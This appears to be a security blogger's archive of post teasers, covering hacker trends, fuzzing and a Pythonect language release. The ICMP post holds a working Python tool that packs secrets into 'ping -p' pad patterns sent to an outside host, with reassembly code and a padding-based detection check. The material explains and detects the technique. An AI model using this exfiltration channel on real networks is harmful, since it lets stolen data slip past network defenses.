Wednesday, December 12, 2018

Staying One Step Ahead Of Criminal Hackers

In our efforts to stay one step ahead of the global criminal hacker cabal, my colleagues and I in the ethical hacker community try to approach our craft like our adversaries. To paraphrase Carl Spackler, we know that, in order to conquer the hacker, we have to learn to think like hackers. We’ve got to get inside the hacker’s pelt and crawl around. When you do that, you develop a begrudging respect for them.

In popular culture, however, criminal hackers can become mythologized, not unlike the way the bank robbers of old were. Despite their chosen professions, the likes of John Dillinger, Bonnie and Clyde, Baby Face Nelson and Ma Barker were sometimes regarded as modern-day Robin Hoods. They were the little guys taking on the rich and powerful with daring and panache. Even when caught, they’d often revel in the attention. When asked why he robbed banks, the infamous “Slick” Willie Sutton supposedly quipped, “Because that’s where the money is.”

That may have been true in the first half of the last century, but not anymore.

Read the full article at Forbes here

Friday, August 24, 2018

Were You Attacked Today With Yesterday's Hacking Technique?

We’re all familiar with the idea of recycling as a means of reducing the waste stream. Most of us are in the habit of separating our paper, plastic, glass and metal trash from other garbage. What you may not know is that recycling is a major trend in the hacker community, too. Many of the data breaches that have struck in recent years were accomplished using software that has been around for a long time -- today’s hack, yesterday’s technique.

Tools that have been proven effective at fooling users and sneaking past network defenses are regularly reused by hackers. Whether the software was developed specifically for hacking or as a tool with a legitimate purpose that has been adapted for a less savory one, the hacker community has become expert at extracting value from what already exists. As with commercial software development, it takes time and money for hackers to write and test their code, and in order to maximize their profits, it makes sense to recycle what works. Often, these tried-and-true products are packaged and sold to others, furthering their potential to do harm.

Read the full article at Forbes here

Wednesday, June 6, 2018

Fixating On Vulnerabilities Is A Vulnerability

You almost have to admire the hackers. Almost. Technology research firm Gartner (via Forbes) estimates that companies will spend $93 billion on cybersecurity technologies in 2018. Yet, according to a recent study by security firm Norton (via MIT Technology Review), the relentless efforts of the global hacking community still netted $172 billion in ill-gotten gains. There’s no indication that things will be any different this year. Why do the hackers continue to succeed? What must industry do to make hacking a less profitable venture for the adversary?

To better understand and answer these questions, it’s useful to examine the hackers’ successes and look for consistencies. But first, let’s define a word that is often misused or misunderstood in cybersecurity discussions: vulnerability.

Read the full article at Forbes here

Thursday, February 16, 2017

The Key To Cybersecurity: Shared Intelligence And Industry Cooperation

Chicago in the 1930s was a hive of organized crime where the bad guys always had the upper hand. As dramatized by the film "The Untouchables," lawman Eliot Ness confides to Officer Jim Malone that he is prepared to do “everything within the law” to take down Al Capone. But streetwise Malone tells Ness that, to win, he must be prepared to do more. “He pulls a knife, you pull a gun. He sends one of yours to the hospital, you send one of his to the morgue. That’s the Chicago way.”

Like ‘30s Chicago, the dark web is crawling with global crime syndicates, and everyone I've talked to says fighting the Chicago way sounds appealing. The problem is that the same laws that make hacking a crime also make it a crime to retaliate.

Read full article at Forbes here

Wednesday, July 13, 2016

Fuzzing The Kill Chain

Fuzzing is a software-testing technique in which you generate a large number of random inputs and see how a program handles them. So what does a testing technique have to do with a process such as the Cyber Kill Chain developed by Lockheed Martin? Easy! Just as fuzzing software produces resilient software, fuzzing a process produces a validated process. The Kill Chain lays out seven steps that adversaries must complete in order to achieve their goals, but is that always the case? Can an attacker pull off a successful attack with just one step? Or three? That’s what we’re going to fuzz out ...

(Again, in order to avoid cross-posting between the different blogs, that was just a brief paragraph and a link to the original post is below).

Continue reading:
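As an added illustration of the software-testing sense of fuzzing that the paragraph starts from (this is my example, not code from the original post, and it does not model the kill-chain analysis the post goes on to do), here is a minimal mutation fuzzer run against a constructed length-prefixed record parser. The parser, the seed input and the mutation strategy are all assumptions made for the demonstration; the parser deliberately trusts its length field, so the fuzzer's job is to find inputs that make it fail with something other than the graceful ValueError it is supposed to raise.

```python
"""Minimal mutation fuzzer against a constructed length-prefixed parser.
Added example, not the original post's code."""
import random
import struct
from collections import Counter


def parse_record(buf: bytes) -> bytes:
    """Constructed target: [u16 big-endian length][payload].
    It validates the header but trusts the length field, the kind of defect fuzzing surfaces."""
    if len(buf) < 2:
        raise ValueError("short header")        # expected rejection, not a bug
    n = struct.unpack(">H", buf[:2])[0]
    payload = buf[2:2 + n]
    first, last = payload[0], payload[n - 1]    # IndexError when n == 0 or n > len(payload)
    return bytes([first ^ last]) + payload      # toy "checksum" byte followed by the payload


def mutate(data: bytes, rng: random.Random) -> bytes:
    """Apply one to three random byte-level mutations: bit flip, insert, or truncate."""
    buf = bytearray(data)
    for _ in range(rng.randint(1, 3)):
        op = rng.choice(("flip", "insert", "truncate"))
        if op == "flip" and buf:
            i = rng.randrange(len(buf))
            buf[i] ^= 1 << rng.randrange(8)
        elif op == "insert":
            buf.insert(rng.randint(0, len(buf)), rng.randrange(256))
        elif op == "truncate" and buf:
            del buf[rng.randrange(len(buf)):]
    return bytes(buf)


def fuzz(target, seed_input: bytes, iterations: int, seed: int = 0,
         expected=(ValueError,)) -> dict:
    """Feed mutated inputs to target; count unexpected exception types and keep
    the first input that triggered each one."""
    rng = random.Random(seed)                    # fixed seed so a run is reproducible
    crashes, hits = {}, Counter()
    for _ in range(iterations):
        candidate = mutate(seed_input, rng)
        try:
            target(candidate)
        except expected:
            continue                             # graceful rejection is fine
        except Exception as exc:                 # anything else is a finding
            name = type(exc).__name__
            hits[name] += 1
            crashes.setdefault(name, candidate)
    return {"hits": dict(hits), "crashes": crashes}


if __name__ == "__main__":
    report = fuzz(parse_record, b"\x00\x05hello", iterations=2000)   # constructed seed input
    for name, trigger in report["crashes"].items():
        print(f"{name}: {report['hits'][name]} hits, first trigger {trigger!r}")
```

The point of the `expected` tuple is that a fuzzer needs an oracle: rejecting malformed input with the documented exception is correct behaviour, while an IndexError escaping from the parser is a bug report waiting to be written.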

Wednesday, December 2, 2015

I See Your True ECHO_REQUEST Patterns (Pinging Data Away)

I've started blogging again! In order to avoid cross-posting between the different blogs, I'll just give a brief paragraph and a link back to the original post. Here we go:

Getting into a network and getting data out of a network are two different challenges. Just because an employee clicked on a malicious link and got hacked doesn’t mean the attacker gets to walk off with PII, financials, source code, etc. In this blog post, we’ll explore the known breach method of using the ICMP protocol for data exfiltration, but with a twist. Instead of showing how to use this breach method with custom-made tools, we’re going to do it using the default and common ping utility, red team style!

Continue reading:
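The following is an added example of mine, not the original post's tooling, that models both ends of the technique with the stock iputils `ping -p` option (which accepts up to 16 pad bytes as hex): the sender splits a secret into 16-byte pad patterns and emits one ping command per chunk, and the receiver recovers the chunks from captured echo-request data. It also carries the check a defender wants: is the padding the stock incrementing sequence, or something else? Assumptions, marked in the code: the default 56-byte data field; that ping repeats the pattern from the start of the data area and then overwrites the first 16 bytes with its timestamp, so an intact copy of the pattern sits at offset 32; that the stock payload is `data[i] = i` (the familiar `!"#$%&'()*+,-./01234567` tail). The secret, the target address and the length-prefixed framing are constructed for the demonstration.

```python
"""Both ends of ping-based exfiltration with the stock iputils `ping -p` option:
sender-side chunking into pad patterns, receiver-side recovery from captured
echo-request data, plus a detector check for non-default padding.
Added example, not the original post's tooling; layout assumptions are marked."""
import math
from typing import List, Optional

PATTERN_LEN = 16       # iputils ping -p accepts at most 16 pad bytes (32 hex digits)
DATA_LEN = 56          # default echo-request data size for Linux ping
TIMESTAMP_LEN = 16     # ASSUMPTION: ping overwrites the first 16 data bytes with a timestamp
PATTERN_OFFSET = 32    # multiple of 16 past the timestamp, so an intact copy of the pattern sits here
BYTES_PER_PING = PATTERN_LEN - 1   # the first pattern byte carries the chunk length


def frame_chunks(secret: bytes) -> List[bytes]:
    """Split the secret into 16-byte patterns: [len][up to 15 data bytes][zero pad].
    Padding to a full 16 bytes keeps the repeat period fixed, so the receiver
    never has to guess where a short pattern starts."""
    frames = []
    for off in range(0, len(secret), BYTES_PER_PING):
        chunk = secret[off:off + BYTES_PER_PING]
        frames.append(bytes([len(chunk)]) + chunk.ljust(BYTES_PER_PING, b"\x00"))
    return frames


def ping_commands(secret: bytes, target: str) -> List[str]:
    """One ping per frame; the hex string becomes the ICMP pad pattern."""
    return [f"ping -c 1 -p {frame.hex()} {target}" for frame in frame_chunks(secret)]


def model_payload(frame: bytes, timestamp: bytes = bytes(TIMESTAMP_LEN)) -> bytes:
    """ASSUMPTION about the iputils layout: the pattern is repeated from data
    offset 0 to fill DATA_LEN bytes, then the timestamp overwrites the first bytes."""
    filled = (frame * math.ceil(DATA_LEN / len(frame)))[:DATA_LEN]
    return timestamp + filled[TIMESTAMP_LEN:]


def default_payload(timestamp: bytes = bytes(TIMESTAMP_LEN)) -> bytes:
    """Stock Linux ping without -p fills data[i] = i (assumption about iputils),
    giving the familiar '!"#$%&...' tail; used here as the benign baseline."""
    return timestamp + bytes(range(TIMESTAMP_LEN, DATA_LEN))


def is_default_pad(data: bytes) -> bool:
    """Detector heuristic: an echo request whose padding is not the stock sequence deserves a look."""
    return data[TIMESTAMP_LEN:] == bytes(range(TIMESTAMP_LEN, len(data)))


def recover_chunk(data: bytes) -> Optional[bytes]:
    """Pull our framed chunk out of one captured echo-request data field."""
    if len(data) < PATTERN_OFFSET + PATTERN_LEN or is_default_pad(data):
        return None
    frame = data[PATTERN_OFFSET:PATTERN_OFFSET + PATTERN_LEN]
    n = frame[0]
    if not 1 <= n <= BYTES_PER_PING:
        return None                 # some other use of -p, not our framing
    return frame[1:1 + n]


def reassemble(payloads: List[bytes]) -> bytes:
    """Join recovered chunks in capture order. There are no sequence numbers,
    so this toy framing depends on the pings arriving in order."""
    return b"".join(c for c in map(recover_chunk, payloads) if c)


def pattern_from_command(cmd: str) -> bytes:
    """Parse the hex argument back out of a generated command (demo only)."""
    return bytes.fromhex(cmd.split(" -p ")[1].split()[0])


if __name__ == "__main__":
    secret = b"ssn=123-45-6789;cc=4111111111111111"   # constructed sample data
    cmds = ping_commands(secret, "203.0.113.5")          # documentation-range address
    print("\n".join(cmds))
    captured = [model_payload(pattern_from_command(c)) for c in cmds]
    print("recovered:", reassemble(captured) == secret)
    print("stock ping looks benign:", is_default_pad(default_payload()))
```

On the wire this is 15 bytes of data per echo request, which is why the detection side does not need deep inspection to notice it: a host emitting hundreds of single-packet pings with non-stock padding is the signal, and the pad-pattern check above is the cheapest way to separate those from ordinary connectivity tests.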

Wednesday, August 7, 2013

Pythonect Has New Graphs, Documentation, Tutorial, and More!

About two weeks ago I released a new version of Pythonect (0.6) with new features, documentation, a tutorial, and a (small, but growing) examples directory.
I’d like to take this opportunity to discuss the past, present and future of the Pythonect Project.

Nearly 2 years ago I started working on Pythonect with the intention of helping software developers connect the dots and make mashups, rapid prototyping, and developing scalable distributed applications easy. Pythonect is a new, experimental, general-purpose dataflow programming language based on Python. It aims to combine the intuitive feel of shell scripting (and all of its perks, like implicit parallelism) with the flexibility and agility of Python. The Pythonect interpreter (and reference implementation) is free and open source software written completely in Python, and is available under the BSD 3-Clause license.

Why Pythonect? Pythonect, being a dataflow programming language, treats data as something that originates from a source, flows through a number of processing components, and arrives at some final destination. As such, it is most suitable for creating applications that are themselves focused on the "flow" of data. Perhaps the most readily available example of a dataflow-oriented application comes from the realm of real-time signal processing, e.g. a video signal processor which starts with a video input, modifies it through a number of processing components (video filters), and finally outputs it to a video display.

As with video, many applications can be expressed as a network of different components that are connected by a number of communication channels. The benefits, and perhaps the greatest incentives, of expressing an application this way are scalability and parallelism. The different components in the network can be rearranged to create entirely new dataflows without requiring the relationships between them to be hardcoded. Also, the design and concept of components make it easier to run on distributed systems and parallel processors.

Here is the canonical "Hello, world" example program in Pythonect:
"Hello, world" -> print
And here is the canonical "Hello, world" multi-threaded example program in Pythonect:
"Hello, world" -> [print, print]
Not to mention that you can go from multi-threaded to multi-processed as easily as:
"Hello, world" -> [print &, print &]
Or remotely call a procedure using XML-RPC:
"Hello, world" -> print@xmlrpc://localhost:8081
The language couldn't possibly be simpler...
Okay, so what's new you're asking? *I was wrong*, it can be simpler, and it is in Pythonect version 0.6 :-)

In Pythonect 0.6.0 I have re-written the engine and some large parts of the backend. Pythonect now uses a graph (a NetworkX DiGraph) as its data structure, and it also supports multiple input file formats. Currently, Pythonect (since version 0.6) supports 3 file formats:
  • *.P2Y (text-based scripting language that aims to combine the quick and intuitive feel of shell scripting with the power of Python)
  • *.DIA (visual programming language enabled by Dia)
  • *.VDX (visual programming language enabled by Microsoft Visio XML)
In other words:

is equal to:
"Hello, world" -> print
And vice versa. You can launch (almost) any graph/diagram editor and save a graph/diagram in *.VDX or *.DIA format, and Pythonect will be able to parse and run it (even if it's gzipped!). Curious to see what a multi-threading/processing graph looks like? See below!

Yup, it's that simple. One node with two edges. The graph above is equal to:
"Hello, world" -> [print, print]
Which is the canonical "Hello, world" multi-threaded example program. Now, another issue that I have addressed in this release is the reduce functionality.
The famous reduce from big data. Let's say that we want to write a program that will add one to every integer input and eventually sum all the results:
[1,2,3] -> _ + 1 -> sum -> print
The above example won't work because Pythonect maps (think MapReduce) each iterable value to its own thread, so the sum function will actually receive 2, 3, 4 separately and not as a list. A workaround for this will be:
sum(`[1,2,3] -> _+1`) -> print
But with the new reduce functionality in Pythonect 0.6, it is as easy as:
[1,2,3] -> _ + 1 -> sum(_!) -> print
By using the _! identifier, the Pythonect interpreter will automatically join all the values (and threads/processes) into a single list and pass it to the Python function without any prerequisites. The same applies when using a graph:

is equal to:
[1,2,3] -> _ + 1 -> sum(_!) -> print
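To make the map-then-reduce semantics concrete for readers who have not run Pythonect, here is an added plain-Python model of them, written by me rather than taken from Pythonect's engine: `run_flow` and `Reduce` are stand-ins for the interpreter and for the `_!` identifier, not Pythonect APIs. It reproduces the three programs above: each element of the source list flows through the stages on its own thread, so `sum` applied as an ordinary stage sees 2, 3 and 4 one at a time and fails; the backtick workaround collects a sub-flow's results before summing outside it; and a reduce stage joins the in-flight values into one list before calling its function, after which a single value continues downstream.

```python
"""Plain-Python model of Pythonect's per-element threading and the `_!` reduce.
Added example; run_flow and Reduce are stand-ins, not Pythonect's own engine."""
from concurrent.futures import ThreadPoolExecutor
from typing import Any, Callable, Iterable, List


class Reduce:
    """Stage that wants all in-flight values joined into one list first (the `_!` identifier)."""

    def __init__(self, fn: Callable[[list], Any]):
        self.fn = fn


def run_flow(values: Iterable[Any], *stages) -> List[Any]:
    """Every element flows through the stages on its own thread (implicit map);
    a Reduce stage joins the threads and hands the whole list to its function."""
    current = list(values)
    with ThreadPoolExecutor() as pool:
        for stage in stages:
            if isinstance(stage, Reduce):
                current = [stage.fn(current)]             # join: one value continues downstream
            else:
                current = list(pool.map(stage, current))  # map: one task per in-flight value
    return current


def without_reduce() -> str:
    """`[1,2,3] -> _ + 1 -> sum`: sum is applied to 2, 3 and 4 separately and fails."""
    try:
        run_flow([1, 2, 3], lambda _: _ + 1, sum)
    except TypeError as exc:
        return str(exc)          # sum(2) -> 'int' object is not iterable
    return "no error"


def with_workaround() -> int:
    """sum(`[1,2,3] -> _+1`): collect the sub-flow's results, then sum outside it."""
    return sum(run_flow([1, 2, 3], lambda _: _ + 1))


def with_reduce() -> int:
    """`[1,2,3] -> _ + 1 -> sum(_!)`: the Reduce stage joins the values before calling sum."""
    return run_flow([1, 2, 3], lambda _: _ + 1, Reduce(sum))[0]


def reduce_then_continue() -> List[Any]:
    """After a reduce the flow carries a single value, which later stages see once."""
    return run_flow([1, 2, 3], lambda _: _ + 1, Reduce(sum), lambda total: total * 10)


if __name__ == "__main__":
    print("without _!:", without_reduce())
    print("workaround:", with_workaround())
    print("with _!:", with_reduce())
    print("reduce then map:", reduce_then_continue())
```

The model also makes the cost of the workaround visible: the backtick form runs the sub-flow to completion and hands a Python list back to the enclosing expression, while the reduce stage stays inside the flow, so further stages can follow it.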
Now let's talk about the future of Pythonect. Here's a link to the TODO list, where you can find future directions. In a nutshell, more graphs, more Python implementation support, and more Service-oriented architecture (SOA).

Right now, the biggest application of Pythonect (to the best of my knowledge) is my second project, Hackersh. Hacker Shell (hackersh) is a free and open source command-line shell and scripting language designed especially for security testing. It is written in Python and uses Pythonect as its scripting engine. The upcoming release of Hackersh (work in progress!) will also enjoy the Pythonect 0.6 features such as graphs (*.VDX and *.DIA) as scripts and better reduce functionality.

To learn more about Pythonect, please visit its homepage: and be sure to check out the new documentation at: where you can find an up-to-date tutorial and installation instructions.

That's all for now!